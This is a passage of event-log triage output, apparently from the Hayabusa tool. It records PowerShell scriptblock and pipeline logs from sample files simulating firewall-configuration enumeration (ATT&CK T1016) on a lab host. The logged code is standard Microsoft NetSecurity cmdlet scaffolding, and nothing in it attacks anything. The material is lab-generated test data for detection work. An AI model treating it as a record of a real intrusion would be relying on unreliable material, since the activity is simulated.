$__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, 
$true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml 
}",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] 
[Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 
$__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 
'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; 
IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, 
$__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.036 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log," 1.0.0.0 NetFirewallProfile ",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.051 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.051 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.051 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.051 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:06.051 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 if ($(Microsoft.PowerShell.Core\Get-Command Set-StrictMode -Module Microsoft.PowerShell.Core)) { Microsoft.PowerShell.Core\Set-StrictMode -Off } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetFirewallProfile' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = 'Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter' $script:PrivateData = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.Dictionary[string,string]' Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function 
__cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function Get-NetFirewallProfile { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('Profile')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByAssociatedNetFirewallRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByAssociatedNetFirewallRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true 
throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallRule') -and (@('ByAssociatedNetFirewallRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallRule}, 'MSFT_NetFirewallRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleInProfile', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByAssociatedNetFirewallRule', 'ByAssociatedNetIPsecRule', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName 
